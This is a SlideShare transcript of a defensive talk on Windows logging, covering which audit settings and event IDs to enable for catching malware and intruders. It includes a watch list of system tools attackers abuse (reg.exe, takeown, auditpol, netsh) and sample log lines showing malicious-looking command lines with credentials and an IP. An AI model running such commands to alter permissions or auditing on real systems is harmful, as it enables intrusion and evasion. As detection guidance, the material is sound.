Logs, Logs, Logs
What you need to know
to catch a thief
Jason Freddy
MalwareArchaeology.com
Who am I
• Blue Team Defender Ninja, Logoholic, Malware
Archaeologist
• I love logs – they tell us Who, What, Where, When ...
Why are logs important?
• Have you ever had an Incident and called a
consultancy?
• What is one of the first, if not the f...
Yes, Logs ARE SEXY!
• SEXY - because logs tell you what a particular malware did or the
malwarian (aka Bad Actor) did on y...
Malware and Logs
• I love malware and malware discovery
• But once I find an infected system, what
happened before I found...
You’re Next
97,000 76 Mil + 8 Mil
1000+ Businesses395 Stores
4.5 Million
25,000
4.9 Million
4.03 Million
105k trans
40 Mil...
So why listen to me?
• I have been there
• In the worst way
• Found the malware quickly
• Discovered it 10 months before t...
Get this document!
• www.MalwareArchaeology.comlogs
So what can you do with logs?
You could catch CryptoWall
You can catch Malwarians
So what can we do with logs?
• More than you would have ever guessed
• Not only detect Target, Neiman Marcus, Michael’s,
H...
Auditing
Audit the Registry
• Run Keys HKLM & HKCU
• Services Some keys are noisy – disable
• Use Malware Management to guide you
•...
Audit Key Directories
• C:Perflogs
• C:UsersxyxAppDataLocal
• C:UsersxyxAppDataLocalLow
• C:UsersxyxAppDataRoaming
• C:Pro...
Enable File Creation Auditing
• There are key locations
that everyone should…
MUST watch
• C:Windows
• C:System32
• ..Syst...
Audit Key Directories
File Auditing – New Files - 4663
New File detected
• New Files Created
• Bladelogic.exe
• Event ID:
– 4663
CC Data file created
• New Files Created
• Bladelogic.exe
• Event ID:
– 4663
Odd account used
• Logon – Odd user?
– Best1_user
• Event ID:
– 4624
The DETAILS
CMD.Exe executed
• New Process - Command Shell – YAY
• Event ID:
– 4688
CMD.Exe executed
• Knowing something suspicious executed is great
• BUT
• Knowing what was executed on the Command
Line is...
Get the Command Line!
• It’s nice to know cmd.exe executed, but we REALLY want to see what was
executed. It would be bette...
Command Line GOLD
Catch them trying to share
Not just CMD.EXE but the hack details
Not just CMD.EXE but the hack details
Another example
So what did we learn from these?
• You MUST enable Command Line logging
• Monitor commands:
– Cmd.exe Command Shell
– Nets...
Translate this into Event Codes
• Process Create 4688
– Of course enable CMD Line logging
• File/Registry Auditing 4663
• ...
The Manual way - 4688
• Look for Executables in UsersAppData
WevtUtil qe Security /q:"*[System[(EventID=4688)]]" /c:50 /rd...
The Manual way - 4688
Last 1000 records
WevtUtil qe Security /q:"*[System[(EventID=4688)]]" /c:1000 /rd:true /f:text | fin...
The Manual way - 4688
Last 1000 records
WevtUtil qe Security /q:"*[System[(EventID=4688)]]" /c:1000 /rd:true /f:text | fin...
Catch Dave’s SET
& MetaSploit too
Enable Powershell command line
• It’s nice to know Powershell executed, but we REALLY want to see what was executed
• Agai...
Enable Powershell command line
• And if a bypass is used?
• EventCode 4688 with
command line to the
rescue!
• This is a MU...
Log everything!
• If it is Internet facing… LOG IT!
• Hack yourself or use Pen Tests to improve your
logs – Catch them in ...
In Summary
• Malware is noisy
• We CAN detect it
• Logs can hold all types of information
– It’s NOT just for Forensics an...
Resources
• Our Website
– MalwareArchaeology.com
• The Handout – Windows Logging Cheat Sheet
– www.MalwareArchaeology/logs
Questions?
• You can find me at:
• @HackerHurricane
• Yes – We do consulting ;-)
Prochain SlideShare
Chargement dans…5
×

Logs, Logs, Logs - What you need to know to catch a thief

2 022 vues

Publié le

This will help you get started at Windows logging. What to Enable, Configure, Gather and Harvest to start catching hackers in their tracks.

The Windows Logging Cheat Sheet and SEXY Six Event ID's you MUST monitor and alert on.

Publié dans : Technologie

Logs, Logs, Logs - What you need to know to catch a thief

  1. 1. Logs, Logs, Logs What you need to know to catch a thief Jason Freddy MalwareArchaeology.com
  2. 2. Who am I • Blue Team Defender Ninja, Logoholic, Malware Archaeologist • I love logs – they tell us Who, What, Where, When and hopefully How • Author of the “Windows Logging Cheat Sheet” • @HackerHurricane also my Blog • Inventor of the Malware Management Framework
  3. 3. Why are logs important? • Have you ever had an Incident and called a consultancy? • What is one of the first, if not the first thing they do? • It is referenced in every DBIR report • LOGS! • Details of what happened, where, how and by whom
  4. 4. Yes, Logs ARE SEXY! • SEXY - because logs tell you what a particular malware did or the malwarian (aka Bad Actor) did on your system(s) • SEXY – Because they are the one way that you can get the details you need to know what happened • SEXY – Because this preso is going to show you how for Windows systems • SEXY – Because if Target, Neiman Marcus, Michael’s, Home Depot… did this… I wouldn’t have a presentation • NOT SEXY – Because most logs are not enabled or configured properly • And because….
  5. 5. Malware and Logs • I love malware and malware discovery • But once I find an infected system, what happened before I found it? • Was there more than one system involved? • What did the Malwarian do? • What behavior did the system or systems have after the initial infection? • Logs are the perfect partner to malware! If you do it right you could have detected all this…
  6. 6. You’re Next 97,000 76 Mil + 8 Mil 1000+ Businesses395 Stores 4.5 Million 25,000 4.9 Million 4.03 Million 105k trans 40 Million 40+70 Million $148 Mil 33 locations 650k - 2010 ?????? 76,000 670,000 1900 locations 145 Million 20,000 3 Million 35,000 60,000 alerts 990,000 56 Mil 550,000 TBD Citigroup, E*Trade Financial Corp., Regions Financial Crop, HSBC Holdings and ADP ??????
  7. 7. So why listen to me? • I have been there • In the worst way • Found the malware quickly • Discovered it 10 months before the Kaspersky report • We needed to know more… Who, What, Where, When and How • Found logs were not fully enabled or configured and couldn’t get the data we needed • Once the Logs were enabled and configured, we saw all kinds of cool stuff, showed the How that we ALL NEED • After CryptoLocker I created the definitive guide: – “The Windows Logging Cheat Sheet”
  8. 8. Get this document! • www.MalwareArchaeology.comlogs
  9. 9. So what can you do with logs?
  10. 10. You could catch CryptoWall
  11. 11. You can catch Malwarians
  12. 12. So what can we do with logs? • More than you would have ever guessed • Not only detect Target, Neiman Marcus, Michael’s, Home Depot, Anthem, etc… • But also government sponsored malware like Casper, Regin, Cleaver, Stuxnet, Duqu, Flamer, etc. • Yes, even the really bad stuff, well good stuff to me ;-) • IF… you know what to look for • And why this talk… so you can learn WHAT to look for
  13. 13. Auditing
  14. 14. Audit the Registry • Run Keys HKLM & HKCU • Services Some keys are noisy – disable • Use Malware Management to guide you • Keys that are not noisy. You will know once you enable auditing and see tons of 4663 events • Tune them to be quiet… • Which means… Remove the normal
  15. 15. Audit Key Directories • C:Perflogs • C:UsersxyxAppDataLocal • C:UsersxyxAppDataLocalLow • C:UsersxyxAppDataRoaming • C:Program Files • C:Program Files (x86) • C:ProgramData • C:Windows • C:WindowsSystem • C:WindowsSystem32 • C:WindowsSystem32wbem • Every other Windows sub-dir that is small
  16. 16. Enable File Creation Auditing • There are key locations that everyone should… MUST watch • C:Windows • C:System32 • ..System32WBEM • Any dir with .EXE • Just CREATED FILES
  17. 17. Audit Key Directories
  18. 18. File Auditing – New Files - 4663
  19. 19. New File detected • New Files Created • Bladelogic.exe • Event ID: – 4663
  20. 20. CC Data file created • New Files Created • Bladelogic.exe • Event ID: – 4663
  21. 21. Odd account used • Logon – Odd user? – Best1_user • Event ID: – 4624
  22. 22. The DETAILS
  23. 23. CMD.Exe executed • New Process - Command Shell – YAY • Event ID: – 4688
  24. 24. CMD.Exe executed • Knowing something suspicious executed is great • BUT • Knowing what was executed on the Command Line is VITAL to catching the thieves!!! • VITAL !!!! #1 Goal for you in 2015
  25. 25. Get the Command Line! • It’s nice to know cmd.exe executed, but we REALLY want to see what was executed. It would be better if we could see what was executed with svchost.exe! • Again, Windows SUCKS by default, even Windows 8.1 and 2012 R2 – I do think this is the K3wlest NEW Logging feature – Worth the upgrade! • Now available for Win 7 and Server 2008 and later – Needs patch kb3004375 • Set GPO – Must have 2012 DC – Administrative TemplatesSystemAudit Process Creation – "Include command line in process creation events“ – http://technet.microsoft.com/en-us/library/dn535776.aspx • Registry Key – HKLMSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemAudit – ProcessCreationIncludeCmdLine_Enabled DWORD - 1
  26. 26. Command Line GOLD
  27. 27. Catch them trying to share
  28. 28. Not just CMD.EXE but the hack details
  29. 29. Not just CMD.EXE but the hack details
  30. 30. Another example
  31. 31. So what did we learn from these? • You MUST enable Command Line logging • Monitor commands: – Cmd.exe Command Shell – Netstat.exe Network Connections – Cscript Executes VB/C Script – Pushd Sets Directory for Popd – Popd Changes directory back – WMIC Execute WMI commands – Quser.exe Queries the current user – Reg.exe Query and edit the registry – SC.exe Start and Stop Services – Regini.exe Add/Edit registry values – Attrib.exe Change file attributes – Cacls.exe Change file permissions – Xcacls.exe Change file permissions – Takeown.exe Take ownership of a file – Auditpol.exe Sets Auditing settings (GPO too) – Netsh Windows Firewall
  32. 32. Translate this into Event Codes • Process Create 4688 – Of course enable CMD Line logging • File/Registry Auditing 4663 • Service Created 4075 • Service Changed 4070 • User Login Success 4624 • Share accessed 5140 The SEXY SIX
  33. 33. The Manual way - 4688 • Look for Executables in UsersAppData WevtUtil qe Security /q:"*[System[(EventID=4688)]]" /c:50 /rd:true /f:text | find /i "AppData" | find /i "New Process Name" Gives you this: New Process Name: C:Users<username>AppDataLocalmalware.exe New Process Name: C:Users<username>AppDataLocalCitrixGoToMeeting2185g2mvideoconference.exe New Process Name: C:Users<username>AppDataLocalCitrixGoToMeeting2185g2mui.exe New Process Name: C:Users<username> AppDataLocalCitrixGoToMeeting2185g2mlauncher.exe New Process Name: C:Users<username>AppDataLocalCitrixGoToMeeting2185g2mcomm.exe New Process Name: C:Users<username>AppDataLocalCitrixGoToMeeting2185g2mstart.exe New Process Name: C:Users<username>AppDataLocalCitrixGoToMeeting2185G2MInstaller.exe New Process Name: C:Users<username>AppDataLocalCitrixGoToMeeting2185G2MInstaller.exe Filter out Citrix… WevtUtil qe Security /q:"*[System[(EventID=4688)]]" /c:50 /rd:true /f:text | find /i "AppData" | find /i "New Process Name" | find /I /v “CitrixGoTo” Gives you… New Process Name: C:Users<username>AppDataLocalmalware.exe
  34. 34. The Manual way - 4688 Last 1000 records WevtUtil qe Security /q:"*[System[(EventID=4688)]]" /c:1000 /rd:true /f:text | find /i "New Process Name" | find /i "AppData“ New Process Name: C:Users<username>AppDataLocalTempbadstuffmalware.exe New Process Name: C:Users<username>AppDataLocalTempbadstuffmalware.exe New Process Name: C:Users<username>AppDataLocalTempmalware_users_Temp.exe New Process Name: C:Users<username>AppDataLocalNVIDIANvBackendPackages00007063CoProc update.19333411.exe New Process Name: C:Users<username>AppDataRoamingDropboxbinDropbox.exe New Process Name: C:Users<username>AppDataRoamingDropboxbinupdateDropbox.exe New Process Name: C:Users<username>AppDataRoamingDropboxbinDropbox.exe New Process Name: C:Users<username>AppDataLocalApps2.0R9P169LK.0LAEA80CTLH.BZ3dell..tion_0f612f649c4a10af _0005.000b_17ede8fa7a4e5cacDellSystemDetect.exe New Process Name: C:Users<username>AppDataLocalAppleApple Software UpdateSetupAdmin.exe New Process Name: C:Users<username>AppDataLocalTempi4jdel0.exe New Process Name: C:Users<username>AppDataLocalTempe4j9473.tmp_dir1424306522jrebinunpack200.exe New Process Name: C:Users<username>AppDataLocalTempe4j9473.tmp_dir1424306522jrebinunpack200.exe
  35. 35. The Manual way - 4688 Last 1000 records WevtUtil qe Security /q:"*[System[(EventID=4688)]]" /c:1000 /rd:true /f:text | find /i "Command" | find /i ".exe" | find /i /v "windows" | find /i /v "Program files" | find /i /v "taskeng.exe" | find /i /v "taskhost.exe" | find /i /v "logonUI.exe" | find /i /v “consent.exe" | find /i /v "programdata" | find /i /v "nvidianvbackendpackages" | find /i /v "dropbox" | find /i /v "/i" Gives you… Process Command Line: malware.exe Process Command Line: malware.exe 25.233.45.123 Process Command Line: malware_users_Temp.exe /u:hacker /p:yurfracked Process Command Line: wmiadap.exe /F /T /R Process Command Line: rundll32.exe NVCPL.DLL,NvStartupRunOnFirstSessionUserAccount Process Command Line: "C:UsersMGAppDataLocalApps2.0R9P169LK.0LAEA80CTLH.BZ3 dell..tion_0f612f649c4a10af_0005.000b_17ede8fa7a4e5cacDellSystemDetect.exe" Process Command Line: atbroker.exe Process Command Line: C:PROGRA~1SUMOLO~1wrapper.exe -s C:PROGRA~1SUMOLO~1c onfigwrapper.conf Process Command Line: winlogon.exe Process Command Line: "C:UsersMGAppDataLocalAppleApple Software UpdateSetupAdmin.exe" What looks bad?
  36. 36. Catch Dave’s SET & MetaSploit too
  37. 37. Enable Powershell command line • It’s nice to know Powershell executed, but we REALLY want to see what was executed • Again, Windows SUCKS by default, Powershell • Details on setting PowerShell Preference variables – http://technet.microsoft.com/en-us/library/hh847796.aspx • Set Execution Policy to allo .PS1 files to execute so default profile works – powershell Set-ExecutionPolicy RemoteSigned • Create a Default Profile for all users: – C:WindowsSystem32WindowsPowershellv1.0 – Profile.ps1 • Add these to your default profile.ps1 file – $LogCommandHealthEvent = $true – $LogCommandLifecycleEvent = $true • Splunk - Inputs.conf – # Windows platform specific input processor – [WinEventLog://Windows PowerShell] – disabled = 0 • Upgrade to ver 3 or ver 4 • Investigating PowerShell Attacks (DefCon & Blackhat 2014) – Ryan Kazanciyan TECHNICAL DIRECTOR, MANDIANT – Matt Hastings CONSULTANT, MANDIANT
  38. 38. Enable Powershell command line • And if a bypass is used? • EventCode 4688 with command line to the rescue! • This is a MUST to Alert on. If this occurs, you are being hacked!
  39. 39. Log everything! • If it is Internet facing… LOG IT! • Hack yourself or use Pen Tests to improve your logs – Catch them in the act! – Purple Testing • You should catch SQL Injection – Failed Reads, Failed Writes • Bruting of Apps – Get the logs to see this behavior #1 Software Development task • Enable Auditing for NEW Files on Internet servers, you will be amazed how quiet this is
  40. 40. In Summary • Malware is noisy • We CAN detect it • Logs can hold all types of information – It’s NOT just for Forensics anymore • All we have to do is: – Enable the Logs – Configure the Logs – Gather the Logs – Harvest the Logs • Look for 6 SEXY Events • And use the “Windows Logging Cheat Sheet”
  41. 41. Resources • Our Website – MalwareArchaeology.com • The Handout – Windows Logging Cheat Sheet – www.MalwareArchaeology/logs
  42. 42. Questions? • You can find me at: • @HackerHurricane • Yes – We do consulting ;-)

×